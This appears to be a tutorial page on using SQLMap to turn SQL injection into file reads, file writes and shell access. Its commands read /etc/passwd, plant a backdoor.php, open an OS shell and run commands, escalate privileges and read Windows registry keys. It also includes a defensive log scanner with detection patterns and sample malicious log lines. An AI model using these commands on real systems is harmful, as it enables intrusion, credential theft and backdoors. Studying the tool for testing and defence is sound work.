File System Access

Learn how to access the file system through SQL injection vulnerabilities using SQLMap

SQLMap can leverage SQL injection vulnerabilities to interact with the underlying file system of the database server. This capability varies depending on the database management system (DBMS) and the privileges of the database user.

Reading Files (--file-read)

To read files from the database server's file system:

sqlmap -u "http://www.example.com/vuln.php?id=1" --file-read="/etc/passwd"

This attempts to read the specified file from the server's file system. If the read succeeds, SQLMap saves the file's contents locally in its output directory.

Writing Files (--file-write and --file-dest)

To write files to the database server's file system:

sqlmap -u "http://www.example.com/vuln.php?id=1" --file-write="local_file.php" --file-dest="/var/www/html/backdoor.php"

This command:

  1. Takes a local file (local_file.php)
  2. Uploads it to the target server
  3. Saves it at the specified destination path (/var/www/html/backdoor.php)

OS Shell Access (--os-shell)

SQLMap can attempt to gain operating system shell access:

sqlmap -u "http://www.example.com/vuln.php?id=1" --os-shell

This tries to leverage the SQL injection vulnerability to spawn a shell on the target system. SQLMap will attempt various techniques based on the DBMS:

  • For MySQL: Uses INTO OUTFILE to write a web shell
  • For Microsoft SQL Server: Uses xp_cmdshell
  • For PostgreSQL: Uses COPY TO/FROM or UDF injection
  • For Oracle: Uses Java or external table features
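
From the defender's side, the primitives in the list above leave recognizable traces in web access logs and database query logs. The following is an added example, not part of SQLMap or of the original page: a small log scanner with one pattern per primitive. The rule names, the sample log lines and the table names in them are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# One pattern per primitive named in the list above. Assumption: these are
# starting-point signatures for log review, not a complete rule set.
RULES = {
    "mysql_into_outfile": re.compile(r"\binto\s+outfile\b", re.I),
    "mssql_xp_cmdshell": re.compile(r"\bxp_cmdshell\b", re.I),
    "pgsql_copy_file": re.compile(
        r"\bcopy\s+[\w.\"]+(?:\s*\([^)]*\))?\s+(?:to|from)\s+'", re.I),
    "oracle_external_table": re.compile(r"\borganization\s+external\b", re.I),
}

def normalize(line):
    """URL-decode, then drop inline /* */ comments and collapse whitespace,
    so keyword splitting such as INTO/**/OUTFILE does not hide a match."""
    text = unquote_plus(line)
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text)

def scan(lines):
    """Return [(line_number, [rule names])] for every line that matches."""
    hits = []
    for n, line in enumerate(lines, 1):
        text = normalize(line)
        names = sorted(name for name, rx in RULES.items() if rx.search(text))
        if names:
            hits.append((n, names))
    return hits

# Constructed sample lines (not from a real system): two web access log
# entries followed by four database query log entries.
SAMPLE_LOG = [
    "GET /vuln.php?id=1 HTTP/1.1",
    "GET /vuln.php?id=1%20UNION%20SELECT%20'PLACEHOLDER'%20INTO%2F**%2FOUTFILE"
    "%20'/var/www/html/backdoor.php' HTTP/1.1",
    "mssql: EXEC master..xp_cmdshell 'id'",
    "pgsql: COPY tmp_tbl FROM '/etc/passwd'",
    "mysql: SELECT copy_count FROM books WHERE id = 7",
    "oracle: CREATE TABLE ext_t (line VARCHAR2(4000)) ORGANIZATION EXTERNAL (...)",
]

if __name__ == "__main__":
    for n, names in scan(SAMPLE_LOG):
        print(n, ", ".join(names))
```

Lines 1 and 5 of the sample are benign and produce no hit; a column named copy_count does not trigger the COPY rule because the pattern requires a quoted file path after TO or FROM.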

OS Command Execution (--os-cmd)

To execute a single operating system command:

sqlmap -u "http://www.example.com/vuln.php?id=1" --os-cmd="id"

This executes the specified command on the target system and returns the output.

Privilege Escalation

Some database systems allow for privilege escalation:

sqlmap -u "http://www.example.com/vuln.php?id=1" --privileges --is-dba

Here --privileges enumerates the privileges of the database users and --is-dba checks whether the current database user has administrative (DBA) privileges. If not, SQLMap can sometimes attempt privilege escalation:

sqlmap -u "http://www.example.com/vuln.php?id=1" --priv-esc

Registry Access (Windows)

On Windows systems, SQLMap can access the registry:

sqlmap -u "http://www.example.com/vuln.php?id=1" --reg-read --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

This reads the specified registry key from a Windows target system.